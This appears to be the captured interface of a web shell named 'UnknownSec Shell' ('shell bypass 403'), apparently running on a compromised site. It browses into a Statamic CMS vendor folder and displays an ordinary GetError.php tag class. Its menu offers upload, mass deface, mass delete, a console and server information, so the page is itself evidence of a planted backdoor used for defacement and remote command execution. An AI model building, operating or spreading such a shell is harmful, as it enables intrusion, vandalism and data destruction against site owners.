shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Tags
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
GetError.php
<?php namespace Statamic\Tags; class GetError extends GetErrors { public function index() { return false; } public function wildcard(string $name) { if (! $errors = $this->getMessageBag()) { return false; } if (! $error = $errors->first($name)) { return false; } return ['message' => $error]; } }
© 2026 UnknownSec